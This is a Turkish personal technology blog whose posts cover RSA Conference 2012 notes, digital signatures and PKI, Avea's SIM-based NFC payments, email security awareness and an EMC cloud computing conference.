Browse > Home

| Subcribe RSS

RSA Conference 2012: Güvenlik hakkında son teknik gelişmeler, trendler ve daha fazlası

Güvenlik uzmanları RSA’in ne denli köklü bir firma olduğunu bilirler. 1982 yılında kurulan firma bu tarihten itibaren IT alanında güvenlik, risk ve uygunluk denetimleri alanında birçok çözüm ve danışmanlık hizmetleri sunuyor. Bunların başında Authentication, Access Control, Data Loss Prevention, Encryption, Tokenization, Key Management, Network security monitoring ve Security Information, Event Management gibi faaliyetlerin yanında profesyonel hizmetler de yer alıyor. Yazımın konusu tabii ki firma tanıtımından çok, firmanın her sene düzenlemiş olduğu üst düzey konferans hakkında son trendleri aktarmak. Öyle ki, 5 günlük seminer için katılım fiyatı yaklaşık olarak 2,500 dolar civarında. Neredeyse bir eğitim fiyatına bedel olmasının yanında, aktarılan bilgi değeri ve düzeyinin kesinlikle buna deydiğini söyleyebilirim.

27 Şubat – 2 Mart tarihleri arasında gerçekleştiren konferansa sektörden birçok katılımcı bulunuyor. Bunların başında; EMC, Symantec, McAfee, Microsoft, facebook, salesforce.com, Qualys, Cisco, CA Technologies, HP, Intel. Bunlardan farklı olarak eski İngiltere başbakanı Tony Blair ve Amerika Savunma Bakanlığı gibi konuşmacılar da yer alıyor. Tüm listeye ve konuşmaların içeriklerine bu adresten ulaşabilirsiniz.

Genel bilgi ve içerik hakkında bilgi verdikten sonra esas konumuza dönecek olursak, son trend ve bilgileri aktaracağım. Yazımın bundan sonraki kısmı İngilizce olarak devam edecek ve maddeler halinde sıralayacağım. Gerçekten güzel insight ve bilgiler yer alıyor. Katıldığım konuları koyu olarak işaretledim. Yanlarına kendi yorumlarımı yapacaktım ancak standardı bozmak istemediğim için vazgeçmiş bulunuyorum. Önemli olanlarının yanında yıldız işaretleri ile ayrıca belirttim.

  • Big Data and the consumerization of IT are presenting organisations with a competitive advantage, if managed effectively
  • Someone needs to prove user education IS important *
  • Need to make it easier for users to adopt security. Many people want to do their job & nothing more
  • We won’t be talking about the cloud. It’ll just be an apparent part of our lives
  • We’ll need to re-address everything we have accepted to be true
  • Is everything going to be in the cloud in 2020?
  • Obfuscation of information will be valuable
  • We need to teach users about security the way we teach them about history, not about math *
  • IT has learned the hard way that if they don’t come through, users will simply find a way to work the way they want to
  • Trust in our digital world is in jeopardy. Attackers are taking advantage of gaps in security
  • For the 1st time, tech-savvy employees are absorbing tech faster than gov’t and corps can handle *
  • Security orgs need to learn how to secure that which they can’t directly control
  • Today’s security models are inadequate *
  • Never have we witnessed so many high-profile attacks in one year. Never have so many security firms been attacked directly
  • Accepting the inevitability of compromise does not mean we need to accept the inevitability of loss
  • We need the ability to sift through mountains of information lightning-fast. We need to quickly identify attack patterns *
  • We need to invest in the power of multi-source intelligence *
  • We must learn to evaluate risk at more substantive levels
  • Intelligence-driven security sys must be agile. Today’s systems are patchwork of controls, serving not nearly enough intel
  • We need a new breed of cyber security analyst. They must have analytical skills, big-picture thinking AND people skills  *
  • People refusing to wait for some top-down construct from gov’t or industry. Grass-roots networks providing actionable info
  • We are in combat with a host of adversaries, from irresponsible nation-states to activist hackers
  • Big data will create a lot of opportunities. We just need to make sense of it. Big data will create exciting social opportunities and serious security issues  *
  • Improve basic machine hygiene to counter opportunistic threats and make determined adversaries work harder

Digital Natives; yeni nesil dijital kullanıcılar: More innovative, more enterprising, and more fluent with information technologies than the generations before them.

  • We aren’t digitalnatives; we’re digital immigrants. We don’t trust digital world to always have our best interests in mind
  • The way digitalnatives do business IS the way business will be done in the future  *
  • Lockdown’ environment closes down valuable resources. The next gen workplace needs to be wired for social
  • Stealing information is illegal if you are not a government
  • Communicating efficiently is a good thing. But a great thing is communicating efficiently without compromising sensitive company information!
  • An unencrypted cell phone is, frankly, insignificant when it comes to the risk of employees going rogue on corporate communications  *
  • For hacktivists, arrests scare some but also attract others due to the notoriety that’s created
  • As soon as hacktivists take on responsibilities (e.g., family, careers) their interest in hacktivism recedes dramatically
  • The Anonymous attacks hold up a mirror to our neglect
  • These issues have created a security dialogue in corporations that otherwise wouldn’t have been there
  • Companies engaged in government, financial services, and other specific sectors are most targeted by Anonymous
  • Twitter is perhaps the best detection mechanism for security attacks  *
  • We’re moving towards an environment where everything has an identity (e.g. an IP address)
  • Enterprise users have 339 malware encounters per month

Genel olarak ele aldığımızda, şimdiki teknoloji ve yöntemlerin yetersiz olduğuna değinilmiş. Bilgi’den çok, datayı işleyiş ve çok modelli analiz yöntemleriyle daha hızlı ve efektif bir şekilde çözüm bulmaya ihtiyacımız var gibi gözüküyor. Ayrıca konular arasında ilgimi çeken en önemli şey, Digital Natives kavramı oldu. Artık old school diye tabir edilen geçmişten günümüze gelen yetkin kişilerin yerini bu kavram yer alıyor. Bu nesil bilgi teknolojileriyle daha içli dışlı, daha yaratıcı, daha kurumsal ve bilgiyi edinip daha hızlı bir biçimde karar verip harekete geçebiliyor. Bu nedenle eski yöntemlerle yetişmiş kimseler belki de Anonymous gibi hızlı ve etkili bir şekilde hareket eden topluluklara nazaran daha geride kaldıkları için yenilebiliyorlar. Oldukça önemli ve üstünde durulması gereken bir konu.

Ayrıca bu konulardan bağımsız olarak firmaların güvenlik ve IT odaklı ürünleri olarak RSA 2012 ‘de neler ön plana çıkıyor konulu sunuma göz atmak için http://www.networkworld.com/slideshow/33484 bu sunumu mutlaka incelemenizi öneririm.

Son olarak bahsettiğim konuların birçoğu başlı başına birer yazı olacak nitelikle. Ben gerekli notlarımı aldım. Konferans devam ettiği için yazıyı güncelleyebilir ve özellikle üzerinde durmak istediğim bazı konularda biraz daha derin araştırmaya giderek, bunları ayrı bir blog yazısı halinde sunmayı planlıyorum.

IT’de mottom olan cümle ile yazıma son vermek istiyorum: Never risk your Core Assets!

Tags: , , , , ,

Teknoloji alanında 2010′un getirdikleri

July 4th, 2011 | No Comments | Posted in Mobile, Technology

Epey uzun bir süredir yazı yazmaya hasret kalmıştım. Aslında bu zaman zarfında hem iş yoğunluğumdan ötürü, hemde yazmaya vakit ayıramamanın getirdiği kırgınlık; beni yazı yazmaya push etmenin yegane alevleyicisi oldu. Ciddi bir birikim ve bekleyen konu başlıklarından sonra kaldığım yerden devam ediyorum. Bundan böyle çok daha sık yazmaya gayret göstereceğim.

Öncelikle nereden başlayacağımı bilemiyorum. Teknoloji artık teknoloji olmaktan çıktı ve adeta bir ışık hızı gibi ilerliyor; durdurmak ve hatta yakalamaya çalışmak bir hayli zor. Kimi kesimler özellikle adaptasyon konusunda ciddi çekincelere sahip olsalar da, teknoloji artık hayatımızın her alanında gücünü hissettiriyor ve yakalayamayan geride kalıyor.

Mobil Devrim

Mobilite belki de günümüzde en etkili iletişim aracı. Artık sadece telefon olarak değil, birer akıllı aygıt olarak ta lanse edilen bu teknolojinin kuşkusuz en büyük avantajı; Internet. Apple’ın iPhone ve iPad’leri, Android’in hızla yükselen grafiği, Microsoft’un mobil işletim sistemi gibi çoğaltabileceğimiz bu alan, özellikle uygulama bazında ele aldığımızda ön plana çıkıyor. Devir mobilite devrine girerken; bu alandaki dizüstü bilgisayar ve netbook adı verilen daha az performanslı cihazlar artık kullanılmamaya başlandı. Örneğin kız kardeşim henüz 20 yaşında olmasına rağmen, iPhone 4 alması ile birlikte ona hediye ettiğim dizüstü’nün artık yüzüne bile bakmıyor. Neden mi? Çünkü dizüstü ile yapabildiği herşeyi bu akıllı telefon ile fazlası ile yapabiliyor. Burada aslında üzerinde durulması gereken teknolojinin getirdiğinden çok, uygulanabilirite ve ergonomi. Bana göre Android yükselen bir trend olmasına rağmen henüz hala tam olarak oturamadı. Tablet ve telefon alanında esas patlamanın 2011′in sonuna doğru olmasına bekliyorum. Burada anahtar sözcük “Uygulama” . Bu platformlarda ne kadar çok verimli ve efektif uygulama görürsek; bu platformların gücünü o kadar daha iyi hissedebileceğiz.

Internet İletişimi

Biz hala 3G ile yerimizde sayaduralım; Verizon ABD’de birçok eyalette başlattığı hızlı LTE ağını devreye soktu. Bu teknolojiye alternatif olarak sunulan WiMax ve HSPA+ hizmetleri de farklı operatörler tarafından devreye alınırken; şu an hala çalışma ve testleri devam eden LTE Advanced teknolojileri 4G’nin önünün ciddi manada sağlam olduğuna işaret ediyor. Geçenlerde hayatımda ilk defa Turkcell 3G ile saniyede 550kb’lık veri transfer hızı gördüğümü varsayarsak; 4G ile bu hızın 3 ile 5 Mbps arasında değişen hızlara ulaşacak olması, ne kadar hızlı bir bağlantı altyapısının olduğuna dair sizlere örnek verebilir. İletişim olarak baktığımızda ise bu konuda aşağıdaki Sosyal Medya konusunu inceleyebilirsiniz.

Siber Savaş Dönemi mi başlıyor?

Aslında bu konu başlı başına bir yazı niteliği taşıyor ancak kısaca değinmek istiyorum. Teknolojinin ilerlemesiyle birlikte Dünya’da bir trend haline gelen Enerji Kaynaklarının Dijital Ortama geçiş evresi SCADA olarak isimlendiriliyor. Durum bu hale gelince, enerjinin korunumu da ülkeler açısından bir hayli önem kazanmak zorunda. Düşünsenize, bir ülkenin tüm elektrik şebekesi dijital ortama aktarılıyor ve bu sistemin bir anda çökmesi ile yaşanacak enerji krizini yönetmek ne kadar zorlaşabilir? Yemek yemeden haftalarca yaşabilirsiniz, peki ya su içmeden? Ülkelerde bir nevi böyle. Enerji olmadan işlerin devam etmesi imkansıza yakındır. Cep telefonunuz olmadan ne kadar idare edebiliyorsunuz? Peki ya bilgisayarınız? Peki, Buzdolabı ya da kombi’ye ne demeli? İşte hacker’ların ana hedefi de bu SCADA sistemlerini hackleyerek, ülkelere zarar vermek. Stuxnet adı verilen bu sanal saldırılara, ilgili sistemlere yerleşerek onları devre dışı bırakıyor ya da kontrolü bir başkası ele geçiriyor. Neyse ki bu konuda da pekçok güvenlik çözümü var, sonraki yazılarımda detaylıca değineceğim.


Sosyal Medya

Bu adı artık heryerde duymaktan sıkılan bir kullanıcı olarak, ne kadar etkisiz kullanıldığına mı yanayım yoksa kendini bu alanda uzman ilan eden insanlara mı bilemiyorum. Ancak bir gerçek var ki, sosyal medya denilen bu kadar artık hayatımızın her alanında. Hatırlıyorum da yaklaşık 2 sene önce şöyle demiştim; ” Ünlü kişiler kendi Internet sitelerini kuracaklarına facebook’u kullanarak bir fan-page oluşturup; çok daha verimli bir şekilde hayranlarına erişebilirler” Şimdi bakıyorum, fan-page’ler patlama seviyesine ulaştılar. Bu lafı ettiğim zamanlarda hayranı olduğum Vin Diesel’in kullanıcı sayısı 2 milyon civarında idi. Şimdi bakıyorum 27 milyon seviyesine ulaşmış bulunuyor. Rakamı hayal edebiliyor musunuz? En ufak bir güncelleme yapıldığında, erişebileceği 27 milyon kişi var. İnanılmaz bir rakam. Hatta belki de facebook fan page ve twitter gibi ortamlar yüzünden haber siteleri bile tarih olabilir. Bugün yine ünlülerin fanları twitter üzerinden direkt olarak sevdikleri kişi ya da markaları takip edebiliyor hatta siyasi kişilerle dolaylı yoldan da olsa fikir alış-verişi yapabiliyorlar.

2010 için kısa ve hızlı bir analiz, giriş yaptım. 2011 için özellikle IT alanında çok güzel gelişmeler yaşanacak.

Tags: , , ,

Bir seneyi daha geride bırakırken 2011 ve sektörde gelişmeler

Benim için sektörel anlamda oldukça verimli geçen bir seneyi daha geride bırakırken, danışmanlık alanındaki 3. senemi doldurmanın da özellikle doyum ve nitelik açısından hazzını yaşıyorum.

2010 senesinde yaşadığım üzücü birkaç deneyimden sonra sektöre daha farklı bir bakış açısıyla yaklaşmaya başladım. Rakiplerini kötüleyenlerden tutun da, rakip olmalarına rağmen sırf eş-dost muahbbetiyle bilgi çalmaya yönelik toplantılara da şahit oldum. Varsın olsun, bunlar örümcekleşen zihinlerin getirdiği ve sadece para kazanmaya ve rakipleri kötülemeye yönelik hareketler olmaktan öteye gidemedi.

Profesyonel olmak deneyimle değil, iş ahlakıyla birlikte rakiplerinize olan saygınızı hatta ve hatta onların yaptığı işleri benimseyip, daha iyilerini yapma prensibini edinmekle olur.

Bu olumsuz girişten sonra biraz da olumlulardan bahsedelim. Bu sene yaklaşık 10′a yakın projeye imza attık. Kimisi sadece migration’lardan ibaret iken, bazıları extension ve son olarak birçok alanda Türkiye’nin önde gelen firmalarıyla yine Türkiye adına büyük projeler yaptık. Birçok girişim yaptığımız alanlar da oldu ancak çeşitli nedenlerden ötürü bu girişimlerimizden olumsuz sonuç alsak ta, hatalarımızdan ders alarak ilerlemesini bildik.

Ayrıca izlediğim ve izlenimlerim kadarıyla Güvenlik alanına olan ilgi artmaya devam ediyor ve bu artarak devam da edecek. Bunda özellikle Ferruh ve Huzeyfe‘nin çalışmalarını büyük bir beğeni ile izliyorum. Birçok yerde farklı seminer, konferans ve eğitimler vererek insanların bilinçlenmelerini sağlıyorlar. Özellikle Ferruh’un yurtdışındaki girişimi Netsparker da oldukça beğeni kazandı. Hayatımızın WEB’e doğru kaymasıyla özellikle bu alanlarda Güvenlik Testleri, E-mail Güvenliği, Kod Açıkları, E-Ticaret, DDOS gibi alanlardaki artan zaaflar ciddi bir potansiye arzediyor. Bu konuda daha kapsamlı bir yazıyı Ocak ayında yazacağım.

2011 benim için deneyimlerimi daha net pekiştireceğim ve ilgi alanlarımla birlikte belki de farklı alanlara yoğunlaşabileceğim bir sene olacak. Şimdiden herkesin yeni senesini kutluyor ve tüm emellerinizi gerçekleştireceğiniz; hem profesyonel hem de sosyal anlamda başarılarla bir sene diliyorum.

Unutmayın en değerli ve geri getiremediğiniz şey zamanınız. İyi değerlendirin.

Tags:

Dijital imza sertifikası, Elektronik İmza’ya Giriş

November 10th, 2010 | No Comments | Posted in Authentication, Encryption

Ben aslında buna en güzel tabiri ile “Dijital Parmak İzi” demeyi tercih ediyorum. Nasıl ki ülkede yaşayan her vatandaşın belirli bir kimlik bilgisi yer alıyorsa, dijital imza sertifikalarını da bunun gibi düşünebilirsiniz. Çalıştığınız kuruma ait giriş kartınız, ehliyet cüzdanınız, arabanıza ya da evinize ait ruhsat bilgilerinizin hepsinde, sahip olunan nesne/araç ya da belirli kişilere ait bir takım bilgiler yer almaktadır. Dijital sertifikalar da aynı prensibe dayanarak, Internet üzerinde kullandığınız hizmetler doğrultusunda yaptığınız işlemleri sizin yaptığınıza dair elektronik olarak işleme konmasına ve kayıt alması prensibine dayanmaktadır.

Yazılımsal soft olarak saklanabildiği gibi (ki bu tercih edilmeyen bir yöntemdir) genellikle güvenlik unsurları nedeniyle Smart Kart ya da USB Token gibi donanımsal cihazların üzerinde oluşturularak saklanması uygun görülen kişiye özel dijital sertifikalara erişim için ayrıca bir şifre belirlenmiştir. Bu çok özel kişisel bilgiye erişmek için kullandığınız hizmet ile donanım cihazı arasında küçük bir yazılım (middleware) çalışır. Belirli standartları destekleyen bu yazılım ve dijital sertifikasyon hizmetleri, örneğin kendi oluşturduğunuz PDF dökümanını imzlayacağınız zaman, çıktı alıp ıslak imza attıktan sonra faks çekmek ya da kargolamak yerine; kullandığınız PDF yazılımının dijital imza standartlarını destekleyen “plug-in” leri yardımıyla, çok kolay ve rahat bir şekilde gerekli dijital imzalarınızı atabilirsiniz. Her ne kadar gerekmese de, bazı dijital imza’lara ek olarak; dökümanlara kendi ıslak imzanızın bir kopyası da grafik olarak eklenebilmektedir.

Benzer bir uygulama yine iş dünyasında sıklıkla kullanılan e-mail gönderme işlemlerinde kullanılır. Mail Client’ınıza önceden tanıttığınız elektronik imzanız, maili gönderirken otomatik olarak –  şifre işlemlerinden sonra -mailin ilgili header’larına eklenerek karşı tarafa iletilmektedir. Böylece karşı taraf e-posta’nın sizden geldiğini bilecek ve güven sorunu ortadan kalkacaktır. Yine aynı şekilde e-posta’larınızı bu yöntem ile şifreleyebilir ve iletim sırasında herhangi bir değişikliğe mağruz kalmamasını sağlayabilirsiniz.

Elektronik sertifikaların çözüm portföyü bir hayli geniş sayılabilir. Buna gerekli elektronik imzanın atıldığı tarih ve saat bilgisini gösteren Zaman Damgası (Özellikle Finansal kurumlar tarafından kullanılır), e-ticaret için kullanılan SSL Sertifika hizmetleri, yine kurumsal olarak belirli sunucu ve istemcilere erişmek için kullanılan SSL-VPN -Network Logon- hizmetleri gibi düşünebilirsiniz.

Fazla teknik bilgilere yer vermeden genel hatlarıyla aktarmaya çalıştığım bu konu, özellikle yakın zaman Türkiye’de devreye giren e-devlet uygulamaları, henüz yasallaşmayan ancak meclisten özellikle 2011 yılında devreye girmesi beklenen KEP – Kayıtlı Elektronik Posta – gibi servis ve uygulamaların artmasıyla çok büyük bir potansiyele sahip.

PKI (Public Key Infrastructure – Açık Anahtar Altyapısı) sistemlerinin bir parçası olan elektronik sertifikalar şu an yasal olarak geçerliliğe sahip, Turktrust gibi  Türkiye’de 4 farklı kurum tarafından verilebilmektedir.

Bir başka yazımda daha detaylı teknik bilgi vermeyi planlıyorum.

Tags: , , , , , , , , ,

AVEA’nın Dünya’da ilk SIM kartlara entegre NFC, temassız ödeme uygulamaları

November 5th, 2010 | No Comments | Posted in Bilgi Teknolojileri, Mobile

NFC olarak kısaltılan Near Field Communication teknolojisi, kablosuz erişimden farklı olarak kısa alan haberleşme olarak bilinir. Kısaca NFC standartlarına uyumlu elektronik cihazlar arasında yakın mesafeli haberleşmeyi sağlar diyebiliriz. RFID benzeri bir teknoloji olmasına rağmen mesafe olarak sadece santimetre mertebesinde haberleşme sağlayan bu teknoloji, Sony ve Philips tarafından 2003 senesinde oluşturuldu ve gün geçtikteç geliştirilmeye devam ediyor.

3 aşamadan oluşan NFC teknolojisinde stabilite sorunları aşılmış, şu an eko-sistem ile uyumluluğu ve teknolojinin geliştirilmesi devam ederken, NFC Forum’a göre bir yandan da 3. süreç olan son kullanıcı uygulamaları, teknolojisinin yeniden gözden geçirilmesi gibi alanlara ağırlık veriliyor. Süreç bu şekilde işlerken, peki Türkiye’de durum ne? diye sorabilirsiniz. Bu alandaki ilk uygulamaların ne olduğu hakkında bilgim yok ancak özellikle geçen haftalarda katıldığım AVEA’nin bir daveti sonucu, bu alanda çok çarpıcı uygulamalara imza atıldığını öğrendim.

Bildiğiniz gibi Avea bir GSM operatörü ve bu ölçüde daha önceden smart kart ve USB’ye entegre smart kartlarla kullanıldığını bildiğim NFC teknolojisini nasıl uyguladıklarını çok merak etmiştim. Biz yapılan sunumda, NFC’nin SIM karta entegre edildiği bilgisini aldım. Garanti Teknoloji ile ortak geliştirdikleri bir uygulama olan bu proje, dünyada da bir ilk ve örnek olma niteliği taşıması, AR-GE sürecinin iyi planlanmasından kaynaklanıyor.

Peki nasıl işleyecek bu NFC, bize neler kazandıracak?

Dünya’da NFC’yi destekleyen cep telefon sayısı bir elin parmaklarını geçmiyor. Bu nedenden ötürü, SIM kartına entegre bir sistem olarak çalışan Avea’nın uygulaması, bu yönden ciddi bir pazar payı oluşturacaktır. Çünkü mevcut telefon modellerinin %80′ini destekleyen bu sistem, uzaktan yönetilebiliyor, 350K’lık bir hafıza modülüne yaklaşık 8 kredi kartı bilgisi eklenebiliyor ve bunun güvenlik tarafı arka planda EMV standartlarıyla tam uyumlu olarak Garanti Teknoloji ile birlikte oluşturulmuş.

Uygulama Alanları

  • Ön ödemeli alışveriş ile yaklaşık 35TL’ye kadar olan alışverişlerinizde
  • Toplu taşımalarda
  • Yemek kartı olarak
  • Otoyol/Köprü geçişlerinde, Otopark alanlarında
  • Kurumsal Giriş/Çıkış işlemlerinde
  • Stadyum/Spor Salonu girişlerinde

Tüketici Elektroniği olarak ele baktığımızda ise,

• NFC Aygıtlarını Eşleştirmek:
– Kişisel bilgisayar bileşenleri
– Araç içi aygıtları
– Ses aktarma
– Ev sinema ve eğlence sistemleri
– Kulaklık ve telsiz sistemleri
– Kamera ve yazıcılar / Dijital Çerçeveler
• Bağlantı
– Hızlı ve güvenli WLAN kurulumları
– Hızlı data transferi
– Ses aktarma
• Bilgi Edinme
– Smart Tag ile ürün geçmişlerini NFC bazlı bir telefon ile okumak
NFC teknolojisi belki yeni bir teknoloji ancak özellikle geliştirilebilecek uygulama bazında ele aldığımızda çok ciddi bir potansiyele sahip, özellikle de ödeme (payment) konusunda.  Internet kullanımına entegre olarak çalışan uygulamalar geliştirilmeye başlandığında ucu açık, üretkenliği arttıran, yaşamı kolaylaştıran ve otomize eden birçok servisin geliştirebiliecek olması çok umut verici gözüküyor. Benimde kafamda şimdiden birkaç proje fikri oluşmaya başladı diyebilirim.

Konu ile detaylı bilgiyi Avea’nın slideshare’de yer alan sunumunu inceleyebilir ya da Avea’nın ilgili basın açıklamasını okuyabilirsiniz.

Keyifli bir akşam yemeği sohbeti ile birlikte Avea’nın Blog Yazarlarına verdiği önemi ve bu alandaki vizyonları hakkında bilgi alış-verişi yaptık. Eğer yapılırsa, bundan sonraki AR-GE üs ziyaretini oldukça merak ediyorum.

Etkinlikten küçük bir anı

Tags: , , , , , ,

Facebook Hizmet Koşulları: Arkadaş Önermelerinde Şifrelerinizi Kaydetmiyor

October 6th, 2010 | No Comments | Posted in Privacy

facebook, her geçen gün artan şöhreti ile adından sıklıkla bahsettirmeye devam ediyor. Artan kullanıcı sayısı, aldıkları teklifler ve son zamanlarda artan sansür uygulanmayacak tek site olarak lanse edilen facebook’u arkadaşlarını bulma amaçlı kullanan ve gizliliklerine önem veren kullanıcılar için bir bilgi notu mevcut.

Friend Finder, yani arkadaş bulma özelliği ile farklı platformlarda yer alan arkadaşlarını ekleyebileceğiniz bu sisteme erişmek için kullanıcı adı ve şifrenizi talep eden facebook, bu konuyla ilgili olarak bir açıklama getirdi. Arkadaşlarınızın kullanıcı bilgilerini sizin kullanıcınıza import ettikten sonra şifrelerinizin hiçbir şekilde bünyelerinde saklanmadığını belirten facebook yetkilileri, alternatif olarak e-mail adresiniz ile arkadaşlarınızı import edebiliyor. Detaylı bilgi ve ayarları güncellemek için Facebook’a login olduktan sonra http://www.facebook.com/contact_importer/remove_uploads.php adresini ziyaret edebilirsiniz. Ayrıca 2 gün önce güncellenen facebook TOS (Terms of Service) detaylarına yine http://www.facebook.com/terms.php adresinden bakabilirsiniz.

Tags: , , ,

Günümüz İletişim Aracı E-posta’ların Önemi ve Güvenlik Öğeleri

October 2nd, 2010 | No Comments | Posted in e-posta güvenliği, Güvenlik, Phishing

İş dünyasının en sık iletişim araçlarından biri olan E-posta’ların önemi, artan mobil telefon, PDA ve akıllı telefonlarla birlikte her geçen gün artmaya devam ediyor. Bütün bu artan araçlarla birlikte Internet kullanımının artması, beraberinde e-mail/e-posta kullanımını da arttırmaya devam ederken, özellikle son kullanıcılar açısından; phishing saldırıları, malware siteleri, kısaltılmış URL adresleri ve spam gibi zararlı içeriklere sahip e-mail’lere karşı önlem alınmasını zorunlu hale getiriyor. Bu konuda özellikle spam mail içerikli yazımı okuyabilirsiniz.

Web tabanlı vs İstemci Tabanlı

Web tabanlı mail hizmetleri konusunda GMail, Hotmail ve Yahoo’yu örnek gösterebiliriz ya da şirketlerin kendi kurumlarında uyguladıkları Outlook Web Access (OWA) gibi hizmetleri sıralayabiliriz. Tüm hizmetlerin kendi has güvenlik öğeleri olsa da, standart protokol destekleri mevcut. Bunların başında SSL (Secure Socket Layer) ve TLS (Transport Layer Security) geliyor. Bu nedenle bu tür hizmetlere abone olurken mutlaka güvenlik ve gizlilik politiklarına göz atın ve kullanıcı adı/şifrelerinizin şifrelendiği GMail’de bile standart olarak kullanılan HTTP(s) protokolünün kullanıldığına dikkat edin.

İstemci tarafında ise durum daha kontrolümüz altında diyebiliriz. En popüler istemci e-mail araçlarından olan MS Outlook ve Mozilla Thunderbird, kullanıcı isteklerine göre politikalar oluşturabiliyor. Özellikle yeni sürüm Outlook 2011′i ciddi manada beğendiğimi söyleyebilirim. iPhone ile sağladığım entegrasyon ile kişilerin adres bilgilerinden, fotoğraflarına ve takvim bilgilerime kadar hemen herşeyi senkron edebiliyorum ve yine aynı şekilde Outlook’taki toplantılarım iPhone’a eklenerek, vaktinden önce uyarı almamı sağlayabiliyorum.

HTTP(s) ve SMTP gibi transport protokollerinin kullanıldığı e-mail sistemleri kendi güvenlik öğelerini içerir.
Biliyor muydunuz?
E-posta alıcıları kendilerine gelen maillerin gerçekte kim tarafından, hangi IP’den ve hangi süreçlerden geçtiğini izleyebilirler. Bu mailler spam’cilerden geliyor olsa bile…

ISP Güvenliği: Bot’lar ve  Spam’ler

Türkçesi ISS olmasına rağmen nedense hala ISP diye tabir edilen Internet Servis Sağlayıcı’ların oluşturduğu güvenlik kavramları da oldukça önem kazanıyor. Bu konude Türk Telekom’un geçtiğimiz sene projelendirdiği Bot Sistemlere engel teşkil eden Port değişikliğini yine blog yazımdan okuyabilirsiniz. Standart SMTP portunun yerine, daha güvenli olması açısından farklı bir porttan e-mail haberleşmesini sağlayan bu proje ile ciddi bir sorunun önüne geçilmişti.

ISS’lerin bu konudaki en büyük sıkıntıları kuşkusuz sistemlerden dışarıya atılan mailler. Gelen mailler her şekilde belirli taramalardan geçerken, sanırım giden maillerin kontrolü bu kadar da kolay değil (Aslında gayet mümkün). Bu nedenle ISS’lerin en büyük yaptırımı belirli IP aralıklarını bloklamak ya da ilgili bant genişliğini kısıtlamak olabilir. Yine en büyük engellerden bir tanesi de Spam içerikli kabaca propaganda, reklam, zararlı kod’lar içeren reklam içerikli mailler. Bunların önüne geçmek ne yazık ki %100 etkili değil ancak Tumbleweed/Axway, Cisco, Symantec gibi büyük firmaların %99′a varan e-mail güvenliği sağlayan yazılım ve donanım bazlı çözümleri mevcut.

Biliyor muydunuz?

Kişisel Bilgisayarlarınızda Anti-Virüs kullanırken her zaman tam sistem taramasını seçmelisiniz. Bu tarama bilgisayarınızdaki tüm malware, bot ve zararlı kod (malicious code) öğelerini bulmanızı kolaylaştırır.

E-Mail Sistemlerinde Sosyal Mühendislik Kavramı

Aslında bu konudan başlı başına bir blog yazısı çıkabilir ancak genel olarak bahsetmek gerekirse; en çok güvendiğiniz çocukluk arkadaşınızdan gelen e-mailleri bile sorgu/sualsiz açıyorsanız ve güveniyorsanız, bence bu alışkanlığınızı/davranışınızı tekrar gözden geçirmelisiniz. Hiç ummadığınız bir anda e-posta ile birlikte gelen MP3, PDF, MOV ya da en çok kullanılan EXE uzantılı dosyalarda hiç beklemediğiniz zararlı içerik yeralabilir. Kurumlar bunun önlemini rahatlıkla alabilirken, webmail kullanan kişisel e-posta hizmetlerine sahip kişiler, durumdan daha bihaberler. Önlemi ise basit ama ön-sezileriniz sizi yanıltabilir: Burnunuza herhangi bir şekilde kötü koku gelen e-postaları açmayın :)

Yazının sonlarına gelirken, geniş çapta kullanılan dijital imza gibi güvenlik öğelerini de kullanabilirsiniz. Bu konuda OpenPGP, SSL sertifikaları gibi kavramlar; e-postaların siz tarafından atıldığına ya da yine sizin isteğinizde bağlı olarak içeriğin tamamen şifrelenmesini sağlayabilir. Bu opsiyonel ve anlaşılması zor bir sistem gibi gözükse de, bu konuda çalışan vendorlar, sundukları çözümlerle birlikte bu özelliği çok kolay ve uygulanabilir bir hale getirmeyi başarıyorlar.

Tags: , ,

Cloud Computing, Bulut Bilişim evrimi başlıyor

September 28th, 2010 | No Comments | Posted in Bilgi Teknolojileri, Business, Konferans, Technology

Cloud Computing kavramına her ne kadar Bulut Bilişim demeye pek yanaşmasam da, sanırım en genel ve yakışan çevirisi bu olacaktır. Geleceğin teknolojileri olarak lanse edilen Cloud Computing, en genel anlamda; internet bazlı çalışma sistemine dayanarak, birçok istemci/server tarafından paylaşılan kaynak, bilgi ve işlem gücünü temsil ediyor. Bu konunun liderlerinden olan Salesforce.com’un CC hakkında yapmış olduğu bir video bulunuyor, izlemenizi öneririm:

Konuyla ilgili olarak geçtiğimiz hafta EMC’nin düzenlemiş olduğu Cloud Computing konferansına katıldım. Konuları anlık olarak twitter hesabımdan aktarmaya çalışsam da, derlediğim tüm notlarımı bu blog yazımda toplamaya karar verdim. Konferansa birçok firma değişik ve benzer çözümleriyle, Cloud Computing’e yaklaşımlarını ve planladıkları roadmap’lerini paylaştılar.

Konferans’ın en etkili firmalarından olan VMware’in sunumunu yapan 2. başkanı Türk asıllı Enis Konuk’tu. Günümüz hakkında bilgiler aktardıktan sonra çarpıcı bir açıklama geldi: 2009′un son çeyreğinden itibaren sanal sunucular, fiziksel sunucu satışlarını geride bırakmaya başlamış. Geleceğin bilgi havuzlarının zettabyte seviyesine çıkma beklentisiyle birlikte Cloud Computing’in önemine değinilirken, 2020 itibariyle 35 zetabyte data beklentisinin olduğunu ve bunun da 75 milyar tam dolu 16GB’lik iPad bilgisine eşdeğere olacağı aktarıldı. Bu değer günümüzdeki tüm dataların 44 katına eşdeğer; kabaca 20 senede 44kat artış beklentisi var diyebiliriz (Bu arada hatırlatmak gerek: 1 zettabyte = terabyte x gigabyte).

Dünya’daki %84 sanallaştırma hizmetleri VM üzerinde yer alırken, VM’in özellikle gelecekte halka açık cloud veri merkezleri ve sanal masaüstü planları var. Ayrıca firmanın Cloud kavramına yaklaşım sergilediği motto’su da bir hayli hoşum gitti: Virtual Roads, Actual Clouds

Sahneye Türkiye servis sektörünün 2.si olan Koç Sistem çıkarken, firma özellikle Cloud Computing yönetiminin çok zor olduğunu, altyapının hazır olmasına rağmen özellikle entegrasyon açısından sistemin bir hayli sancı çekeceğini dile getirdi.

Bulut Bilişim’in hedefleri arasında: Global Workload Deployment, Data Center Management ve Information Security kavramları yer alıyor. Bu noktada Uber Cloud olarak tanımlanan firmalar arasında Google, Amazon ve Microsoft bulunuyor. Girmesi kolay ama çıkması zor bir model olarak öne çıkan Uber Cloud firmaları, daha çok service provider olarak tanımlanıyor diyebiliriz. EMC’nin Private Cloud kavramında ise; maliyetleri azaltmak için IT Üretkenliği (IT production, lower costs), Servis kalite arttırımı için İş Üretimi ( Business production (improve QoS) ve Servis olarak IT (IT as a Service (Improve agility – facebook örneği) gibi kavramlar yer alıyor.

